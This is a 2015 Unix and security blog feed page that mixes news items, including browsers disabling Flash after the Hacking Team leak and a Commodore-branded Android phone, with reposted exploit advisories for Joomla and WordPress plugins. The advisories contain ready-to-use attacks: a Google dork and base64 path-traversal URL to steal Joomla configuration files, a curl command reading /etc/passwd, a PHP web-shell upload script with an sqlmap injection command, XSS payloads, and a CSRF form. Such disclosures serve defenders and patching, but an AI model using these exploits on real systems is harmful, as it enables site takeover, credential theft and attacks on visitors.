MondoUnix Unix, Linux, FreeBSD, BSD, GNU, Kernel , RHEL, CentOS, Solaris, AIX, HP-UX, Mac OS X, Tru64, SCO UnixWare, Xenix, HOWTO, NETWORKING, IPV6

16Jul/150

Anche Google Chrome disabilita Flash: falle scoperte da Hacking Team

Anche Google Chrome disabilita Flash: falle scoperte da Hacking Team

DOPO Firefox, anche Chrome disabilita il supporto ad Adobe Flash, il popolare lettore di video che dopo l'attacco ad Hacking Team ha mostrato una serie di falle sfruttabili dagli hacker. "Flash è un cadavere che cammina, sono tanti anni che ha delle vulnerabilità. Bisogna prendere atto che è un programma finito", spiega all'ANSA Matteo Flora, informatico ed esperto di sicurezza.

Le disattivazioni su due motori di ricerca molto usati come Chrome e Firefox, arrivano a pochi giorni dalle dichiarazioni del responsabile della sicurezza di Facebook, Alex Stamos, che ha chiesto ad Adobe di interrompere Flash. Adobe, dal suo canto - intervistata dal sito The Register - spiega che si sta impegnando per innalzare le difese.

"Flash vive per inerzia perché è ancora usato da una buona parte di utenti attivi e perché molti siti che lo supportano sono tecnologicamente indietro - sottolinea Matteo Flora -.
Uscirà di scena quando prenderà sempre più piede l'HTML5" (il nuovo standard di Internet, ndr). Secondo l'esperto, inoltre, le disattivazioni su Firefox e Chrome, sono un danno di immagine per Adobe "ma non sono un danno economico diretto, piuttosto un costo transazionale, di riposizionamento strategico sul mercato".

La bufera su Flash è la profezia di Steve Jobs che si avvera: il fondatore di Apple era notoriamente contrario al programma per i problemi di sicurezza e non volle l'installazione su iPad e iPhone.

Fonte: http://www.repubblica.it/tecnologia/sicurezza/2015/07/15/news/anche_google_chrome_disabilita_flash-119137069
(172)

16Jul/150

Commodore PET returns as a nostalgia-powered Android phone

Commodore PET returns as a nostalgia-powered Android phone

If the name "Commodore" conjures up images of clicking keyboards, beige boxes, and blinking command lines rather than buttery smooth ballads, this one's for you. Yes, that mainstay of '80s home computing is back, this time as a mobile phone. The Commodore PET—which shares its name with the iconic all-in-one computer released in 1977—might not run Commodore BASIC, but it does feature a customised version of Android 5.0 Lollipop, a 5.5-inch 1080p IPS display, and a pair of emulators for running old Commodore software.

OK, so the two Italian entrepreneurs behind the PET might be playing on nostalgia just a tad in order to sell a few smartphones, but at the very least it's powered by some respectable hardware. The PET sports an aluminium frame, complete with interchangeable polycarbonate covers, should the stock white appearance and Commodore logos not be quite to your taste (although, you might want to think about why you're buying a Commodore phone if that's the case).

The 5.5-inch 1080p IPS display sits behind a sturdy slab of Gorilla Glass 3, and is powered by a 1.7 GHz Mediatek 64-bit octa-core processor with ARM Mali T760 GPU, 3GB of RAM, and a large 3000mAh battery. There's a rear-facing camera complete with a 13-megapixel Sony sensor and bright f/2.0 aperture, while the front-facing 8-megapixel camera is equipped with an 80-degree wide-angle lens. The PET even supports dual-SIM 4G connectivity.

That's nothing the world hasn't seen done better in other smartphones before, though. What makes the PET special, according to its creators at least, is its custom version of Android. Yes, a custom version of Android is rarely something to get excited about, but at least with the PET it enables special versions of the VICE C64 emulator and the Uae4All2-SDL Amiga emulator.

Unfortunately, there's no word yet on exactly what's so special about these emulators, or if there'll be any pre-installed Commodore software to get started. Other custom functions include an implementation of Daydream—which lets you chose what information appears on the display during charging—and system gestures that let you interact with the phone by shaking it, flipping it, or waving at it.

Whether that's enough to sell a smartphone in a crowded market, Commodore branding or not, remains to be seen. After all, you can download Commodore emulators to pretty much any Android smartphone yourself and get in on the action without having to fork out for a new device. Given the trouble that the PET's creators have gone to in order to secure the Commodore trademark—which languished in obscurity after being handed over to a Dutch company two years ago—hopefully the final devices will sport more than just a logo and pair of emulators.

If you're still interested, the PET will be available in Italy, France, Poland and Germany later in July for around $300 (£191), which buys 16GB of storage with an included 32GB micro SD card. A 32GB version will sell for around $60 (£38) more. Oddly, despite launching in Europe, there's no official Euro price just yet, and no official launch date for the UK either.

Users can choose white, black, or classic beige colours, with green and blue arriving later. The phone's creators have promised to bring the PET to other parts of Europe, as well as America at a later date.

If you're not sure what all the fuss about—i.e. you were born in the '90s—check out Ars' history of the Amiga, which includes the tale of how Commodore bailed out the ailing company in '80s, and how the deal quickly turned sour. And if that's enough, we also took a look at some of our favourite Commodore 64 software on its 30th Anniversary back in 2012.

Fonte Ufficiale: http://arstechnica.com/gadgets/2015/07/commodore-pet-returns-as-a-nostalgia-powered-300-android-phone/
(77)

16Jul/150

Joomla Docman Path Disclosure / Local File Inclusion

# Joomla docman Component 'com_docman' Full Path Disclosure(FPD) & Local File Disclosure/Include(LFD/LFI)
# CWE: CWE-200(FPD) CWE-98(LFI/LFD)
# Risk: High
# Author: Hugo Santiago dos Santos
# Contact: hugo.s@linuxmail.org
# Date: 13/07/2015
# Vendor Homepage: http://extensions.joomla.org/extension/directory-a-documentation/downloads/docman
# Google Dork: inurl:"/components/com_docman/dl2.php"
 
# Xploit (FPD): 
 
 Get one target and just download with blank parameter: 
 http://www.site.com/components/com_docman/dl2.php?archive=0&file=
 
 In title will occur Full Path Disclosure of server.
 
# Xploit (LFD/LFI):
 
 http://www.site.com/components/com_docman/dl2.php?archive=0&file=[LDF]
 
 Let's Xploit...
 
 First we need use Xploit FPD to see the path of target, after that we'll Insert 'configuration.php' configuration database file and encode in Base64:
 
 ../../../../../../../target/www/configuration.php <= Not Ready
 
 http://www.site.com/components/com_docman/dl2.php?archive=0&file=Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA==  <= Ready !
 
 
And Now we have a configuration file...

(79)

16Jul/150

WordPress Image Export 1.1 Arbitrary File Download

Title: Remote file download vulnerability in Wordpress Plugin image-export v1.1
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-01
Download Site: https://wordpress.org/plugins/image-export
Vendor: www.1efthander.com
Vendor Notified: 2015-07-05
Vendor Contact: https://twitter.com/1eftHander
Description: Image Export plugin can help you selectively download images uploaded by an administrator .
Vulnerability:
The code in file download.php doesn't do any checking that the user is requesting files from the uploaded images directory only.  And line 8 attempts to
unlink the file after being downloaded.  This script could be used to delete files out of the wordpress directory if file permissions allow.
 
      1 <?php
      2 if ( isset( $_REQUEST['file'] ) && !empty( $_REQUEST['file'] ) ) {
      3         $file = $_GET['file'];
      4 
      5         header( 'Content-Type: application/zip' );
      6         header( 'Content-Disposition: attachment; filename="' . $file . '"' );
      7         readfile( $file );
      8         unlink( $file );
      9         
     10         exit;
     11 }
     12 ?>
CVEID: TBD
Exploit Code:
  • $ curl http://example.com/wp-content/plugins/image-export/download.php?file=/etc/passwd
Screen Shots:
Advisory: http://www.vapid.dhs.org/advisory.php?v=135

(56)

16Jul/150

WordPress Plotly 1.0.2 Cross Site Scripting

Details
================
Software: Plotly
Version: 1.0.2
Homepage: http://wordpress.org/plugins/wp-plotly/
Advisory report: https://security.dxw.com/advisories/stored-xss-in-plotly-allows-less-privileged-users-to-insert-arbitrary-javascript-into-posts/
CVE: CVE-2015-5484
CVSS: 6.5 (Medium; AV:N/AC:L/Au:S/C:P/I:P/A:P)
 
Description
================
Stored XSS in Plotly allows less privileged users to insert arbitrary JavaScript into posts
 
Vulnerability
================
This plugin allows users who do not have the unfiltered_html capability to insert JavaScript into posts/pages which gets executed by the browsers of other users.
On single sites, only Administrators have the unfiltered_html capability, and on multisite, only Super Admins have this capability. This means that e.g. malicious Admins on a multisite, or malicious Editors would be able to perform XSS attacks against other site users and visitors.
 
Proof of concept
================
 
Create a new post as a user (without the unfiltered_html capability)
Switch to text mode
Place this link on a line by itself: https://plot.ly/~a/’onerror=’alert(1)’>
View the post
 
 
Mitigations
================
Upgrade to version 1.0.3 or later.
N.B. If all accounts are trusted, or all accounts have the unfiltered_html capability, then there is no issue.
 
Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/
 
Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.
 
This vulnerability will be published if we do not receive a response to this report with 14 days.
 
Timeline
================
 
2015-06-04: Discovered
2015-07-09: Reported to vendor via the contact form on the Plotly Enterprise site
2015-07-09: Requested CVE
2015-07-10: Vendor responded and confirmed fixed in 1.0.3
2015-07-13: Published
 
 
 
Discovered by dxw:
================
Tom Adams
Please visit security.dxw.com for more information.

(50)

16Jul/150

WordPress WP-PowerPlayGallery 3.3 File Upload / SQL Injection

Title: Remote file upload vulnerability & SQLi in wordpress plugin wp-powerplaygallery v3.3
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-27
Download Site: https://wordpress.org/plugins/wp-powerplaygallery
Vendor: WP SlideShow
Vendor Notified: 2015-06-29
Advisory: http://www.vapid.dhs.org/advisory.php?v=132
Vendor Contact: plugins@wordpress.org
Description: This is the best gallery for touch screens. It is fully touch enabled with great features. This gallery is compatible wiht iphone and ipads. It is also allow us to use it as a widget.You can also enable this Powerplay Gallery on your wordpress site by placing code snippet in your template (.php) files. It shows flash gallery for desktops and touch enabled version for ipad and iphones.
Vulnerability:
1. Ability to create directories out side of the upload path by using ../:
Lines 56-59 of upload.php:
 
56 // Create target dir
57 if (!file_exists($targetDir)) {
58         @mkdir($targetDir);
59 }      
 
2. Arbitrary file uploads to a path in the web root directory:
Lines 138-160 of uploads.php don’t verify what types of files are allowed or where they should be placed:
 
138 // Open temp file
139 if (!$out = @fopen("{$filePath}.part", $chunks ? "ab" : "wb")) {
140         die('{"jsonrpc" : "2.0", "error" : {"code": 102, "message": "Failed to open output stream."}, "id" :     "id"}');
141 }
142 
143 if (!empty($_FILES)) {
144         if ($_FILES["file"]["error"] || !is_uploaded_file($_FILES["file"]["tmp_name"])) {
145                 die('{"jsonrpc" : "2.0", "error" : {"code": 103, "message": "Failed to move uploaded file."}    , "id" : "id"}');
146         }
147 
148         // Read binary input stream and append it to temp file
149         if (!$in = @fopen($_FILES["file"]["tmp_name"], "rb")) {
150                 die('{"jsonrpc" : "2.0", "error" : {"code": 101, "message": "Failed to open input stream."},     "id" : "id"}');
151         }
152 } else {
153         if (!$in = @fopen("php://input", "rb")) {
154                 die('{"jsonrpc" : "2.0", "error" : {"code": 101, "message": "Failed to open input stream."},     "id" : "id"}');
155         }
156 }
157 
158 while ($buff = fread($in, 4096)) {
159         fwrite($out, $buff);
160 }
 
3. Sql injection 
Lines 131-135 of upload.php fail to handle user input appropriately either by sanitizing or paramaterizing it. Injection points are
any GET/POST to albumid or name.
 
131 $query = "INSERT INTO ".$wpdb->prefix."pp_images (`category_id`, `title`, `description`, `price`, `thumb`, `    image`, `status`, `order`, `creation_date` )
132           VALUES (".$_REQUEST['albumid'].",'".$imgname[0]."','".$imgname[0]."','','".$resize."','".$_REQUEST    ['name']."',1,'','NULL')";
133 
134           $wpdb->query($query);
135 
 
CVEID:
OSVDB:
Exploit Code:
  • <?php
  • /*Remote shell upload exploit for wp-powerplaygallery v3.3 */
  • /*Larry W. Cashdollar @_larry0
  • 6/27/2015
  • albumid needs to be a numeric value matching an existing album number, 1 is probably a good start
  • but you can enumerate these by using curl, and looking for redirect 301 responses:
  • e.g. $ curl http://www.vapidlabs.com/wp-content/uploads/power_play/4_uploadfolder/big
  • ->301 exists else 404 doesn't.
  • shell is http://www.vapidlabs.com/wp-content/uploads/power_play/4_uploadfolder/big/shell.php
  • */
  •  
  •  
  •   $target_url = 'http://www.vapidlabs.com/wp-content/plugins/wp-powerplaygallery/upload.php';
  •   $file_name_with_full_path = '/var/www/shell.php';
  •  
  •         echo "POST to $target_url $file_name_with_full_path";
  •   $post = array('albumid'=>'foo' , 'name' => 'shell.php','file'=>'@'.$file_name_with_full_path);
  •  
  •         $ch = curl_init();
  •   curl_setopt($ch, CURLOPT_URL,$target_url);
  •   curl_setopt($ch, CURLOPT_POST,1);
  •   curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  •         curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
  •   $result=curl_exec ($ch);
  •   curl_close ($ch);
  •         echo "<hr>";
  •   echo $result;
  •         echo "<hr>";
  • ?>
SQLi PoC:
$ sqlmap -u http://www.vapidlabs.com/wp-content/plugins/wp-powerplaygallery/upload.php --data "albumid=1”  —dbms mysql

(70)

16Jul/150

WordPress Floating Social Bar 1.1.5 Cross Site Scripting

# Exploit Title: Floating Social Bar 1.1.5 XSS
# Date: 09-01-2015
# Software Link: https://wordpress.org/plugins/floating-social-bar/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps
 
1. Description
 
Everyone can access save_order().
 
File: floating-social-bar\class-floating-social-bar.php
 
add_action( 'wp_ajax_nopriv_fsb_save_order', array( $this, 'save_order' ) );
 
$_REQUEST['items'] is not escaped.
 
http://security.szurek.pl/floating-social-bar-115-xss.html
 
2. Proof of Concept
 
http://wordpress-url/wp-admin/admin-ajax.php?action=fsb_save_order&items[1]="><script>alert("XSS");</script>
 
XSS will be visible for admin:
 
http://wordpress-url/wp-admin/options-general.php?page=floating-social-bar
 
3. Solution:
 
Update to version 1.1.6

(46)

15Jul/150

Adobe promises Flash improvements after Firefox and Facebook snubs

Adobe promises Flash improvements after Firefox and Facebook snubs

Adobe has promised to do it all can to improve the security of its much maligned Flash tool, in response to criticisms from the new CIO of Facebook and Mozilla blocking the tool from its Firefox browser.

In a blog post by Adobe the company said it was working hard to fix issues that are coming to light since data was leaked from the server of Italian surveillance software firm Hacking Team.

It went on to say that it was because Flash is so widely used it is naturally a target for hackers, but that it is confident it can maintain an adequate level of security for the product.

"Flash Player is one of the most ubiquitous and widely distributed pieces of software in the world, and as such, is a target of malicious hackers," the blog said.

"We are actively working to improve Flash Player security, and as we did in this case, will work to quickly address issues when they are discovered."

The comments come after Mozilla took the notable step of blocking Flash from its browser in light of security concerns that have come to light in the last ten days, after major flaws in Flash were uncovered in data taken from Hacking Team.

Mark Schmidt, head of Firefox support at Mozilla, confirmed that all versions of Flash up to the most recent 18.0.0.203 release have been added to the official Mozilla blocklist.

This came after the incoming chief security officer at Facebook, Alex Stamos, called for Adobe to announce an ‘end-of-life date’ for Flash given the problems it is causing.

“Even if 18 months from now, one set date is the only way to disentangle the dependencies and upgrade the whole ecosystem at once,” he added.

Adobe has issued two major updates for Flash since the flaws were revealed. The first patch fixed the CVE-2015-5119. It was soon forced to issue a second patch for two flaws that were uncovered, termed CVE-2015-5122 and CVE-2015-5123, as it explained in a post on its website.

"Critical vulnerabilities have been identified in Adobe Flash Player 18.0.0.204 and earlier versions for Windows, Macintosh and Linux," it said.

"Successful exploitation could cause a crash and potentially allow an attacker to take control of the affected system."

Adobe rates the flaws as critical and firms have been urged to upgrade as soon as possible. The firm also thanked researchers at FireEye and Trend Micro for uncovering the vulnerabilities.

The revelations are just the latest information to come to light since the hack. Other data revealed that the FBI is a customer of Hacking Team, and is reported to have spent $775,000 on the firm's software.

The revelations from the hack have not come as a huge surprise to those who have criticised Hacking Team in the past, and the firm has been labelled an "enemy of the internet" by Reporters Without Borders.

"Hacking Team describes its lawful interception products as 'offensive technology' and has been called into question over deliveries to Morocco and the United Arab Emirates," the organisation said.

"The company’s 'Remote Control System', called DaVinci, is able, it says, to break encryption on emails, files and internet telephony protocols."

The attackers behind the hack have not yet come to light, but they too were clearly keen to embarrass and discredit Hacking Team, not only releasing the data from its systems but defacing its Twitter account and posting company emails.

The firm’s bio on Twitter was changed to read: 'Developing ineffective, easy-to-pwn offensive technology to compromise the operations of the worldwide law enforcement and intelligence communities.'

The leaked information allegedly includes contracts the company signed with repressive governments such as in Sudan, Uzbekistan and Russia. Hacking Team had denied ever working with Sudan after a report in 2014 accused it of doing so.

Fonte: http://www.v3.co.uk/v3-uk/news/2416392/government-surveillance-software-firm-hacking-team-hit-by-hack-and-data-leak
(106)

13Jul/150

WordPress Twenty Fifteen 4.2.1 Cross Site Scripting

Information
--------------------
Advisory by Netsparker.
Name: DOM XSS Vulnerability in Twenty Fifteen WordPress Theme
Affected Software : WordPress
Affected Versions: 4.2.1 and probably below
Vendor Homepage : https://wordpress.org/ and
https://wordpress.org/themes/twentyfifteen/
Vulnerability Type : DOM based Cross-site Scripting
Severity : Important
CVE-ID: CVE-2015-3429
Netsparker Advisory Reference : NS-15-007
 
Description
--------------------
By exploiting a Cross-site scripting vulnerability the attacker can
hijack a logged in user’s session. This means that the malicious
hacker can change the logged in user’s password and invalidate the
session of the victim while the hacker maintains access. As seen from
the XSS example in this article, if a web application is vulnerable to
cross-site scripting and the administrator’s session is hijacked, the
malicious hacker exploiting the vulnerability will have full admin
privileges on that web application.
 
Technical Details
--------------------
Proof of Concept URL for DOM XSS in WordPress:
 
http://example.com/wordpress/wp-content/themes/twentyfifteen/genericons/example.html#<img/src/onerror=alert(123)>
 
For more information on DOM based cross-site scripting vulnerabilities
read the following article:
https://www.netsparker.com/blog/web-security/dom-based-cross-site-scripting-vulnerability/
 
Advisory Timeline
--------------------
22/04/2015 - First Contact
07/05/2015 - Vulnerability fixed
07/05/2014 - Advisory released
 
Solution
--------------------
Download WordPress version 4.2.2 which includes fix for this vulnerability.
 
Credits & Authors
--------------------
These issues have been discovered by Omar Kurt while testing
Netsparker Web Application Security Scanner -
https://www.netsparker.com/web-vulnerability-scanner/
 
About Netsparker
--------------------
Netsparker finds and reports security issues and vulnerabilities such
as SQL Injection and Cross-site Scripting (XSS) in all websites and
web applications regardless of the platform and the technology they
are built on. Netsparker's unique detection and exploitation
techniques allows it to be dead accurate in reporting hence it's the
first and the only False Positive Free web application security
scanner. For more information visit our website on
https://www.netsparker.com

(73)

13Jul/150

WordPress PictoBrowser 0.3.1 CSRF / XSS

**************************************************************************************
# Title: CSRF / Stored XSS Vulnerability in PictoBrowser Wordpress Plugin 
# Author: Manideep K  
# CVE-ID: CVE-2014-9392
# Plugin Homepage: https://wordpress.org/plugins/pictobrowser-gallery/
# Version Affected: 0.3.1 (probably lower versions)
# Severity: High 
 
# Description: 
Vulnerable Parameter: all text boxes, to name one - pictoBrowserFlickrUser
Vulnerability Class: 
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29
Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)) 
 
# About Vulnerability:  This plugin is vulnerable to a combination of CSRF/XSS attack meaning that if an admin user can be tricked to visit a crafted URL created by attacker (via spear phishing/social engineering), the attacker can insert arbitrary script into admin page. Once exploited, admin’s browser can be made to do almost anything the admin user could typically do by hijacking admin's cookies etc. 
 
# Steps to Reproduce: (POC):
After installing the plugin
1. Goto settings -> PictoBrowser
2. Insert this payload “ "><script>alert(32)</script> “ in any/all of text fields 
Update options and see XSS in action
3. Visit settings page of this plugin anytime later and you can see the script executing as it is stored. 
 
Plugin does not uses any nonces and hence, the same settings can be changed using CSRF attack and the PoC code for the same is below
 
<html>
  <body>
    <form action="http://localhost/wordpress/wp-admin/options-general.php?page=pictobrowser-gallery/options-page.php&updated=true" method="POST">
      <input type="hidden" name="stage" value="process" />
      <input type="hidden" name="pictoBrowserFlickrUser" value=" baby csrf" />
      <input type="hidden" name="pictoBrowserPicasaUser" value=" " />
      <input type="hidden" name="pictoBrowserWidth" value="hi" />
      <input type="hidden" name="pictoBrowserHeight" value="hi" />
      <input type="hidden" name="pictoBrowserBackground" value="hi" />
      <input type="hidden" name="pictoBrowserTransparency" value="hi" />
      <input type="hidden" name="pictoBrowserShowTitles" value="on" />
      <input type="hidden" name="pictoBrowserShowNotes" value="on" />
      <input type="hidden" name="pictoBrowserShowZoom" value="off" />
      <input type="hidden" name="pictoBrowserAutohide" value="on" />
      <input type="hidden" name="pictoBrowserInitScale" value="off" />
      <input type="hidden" name="pictoBrowserImagesize" value="medium" />
      <input type="hidden" name="pictoBrowserVAlign" value="mid" />
      <input type="hidden" name="Submit" value="Save Options »" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
 
 
# Mitigation: 
Plugin Closed
 
# Disclosure:
2014-11-06:  Author notification
2014-11-20:  WP Team action taken by closing the plugin as there is no response from author
2014-12-09: Public Disclosure
 
#Credits:
Manideep K
Information Security Researcher
https://in.linkedin.com/in/manideepk
***************************************************************************************

(54)